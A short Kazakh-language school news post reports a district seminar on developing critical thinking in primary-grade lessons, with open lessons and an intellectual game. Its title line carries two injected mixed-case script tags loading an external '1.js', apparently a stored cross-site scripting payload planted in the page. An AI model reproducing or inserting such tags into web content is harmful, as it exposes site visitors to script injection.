«Бастауыш сыныптар пәндерін оқытуда сыни ойлауды дамыту» аудандық семинар.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.02.2022

Жұма күні Қоянды ауылы №1 жалпы орта беретін мектебі базасында «Бастауыш сыныптар пәндерін оқытуда сыни ойлауды дамыту» тақырыбында аудандық семинар өткізілді. Семинарға аудандық білім бөлімі әдіскері Алшынбаева Толқын Толеновна мен аудан мектептерінің мұғалімдері қатысты.

Семинардың негізгі мақсаты: тәжірибе алмасу, оқушылардың сыни ойлауын дамыту үшін тиімді әдіс-тәсілдерді оқу процесіне енгізу. Семинарда1-4 сынып мұғалімдері математика, қазақ тілі, ана тілі, әдебиеттік оқу, математика, дүниетану пәндерінен ашық сабақтар өткізіп, тәжірибелерімен бөлісті. 3 сыныптар арасында сыныптан тыс зияткерлік ойын ұйымдастырылды. Семинар жұмысы жоғары деңгейде өтті деп бағаланды.

 

Просмотров: 438


Пікір қосу



Деректерді қолтаңбаға қосу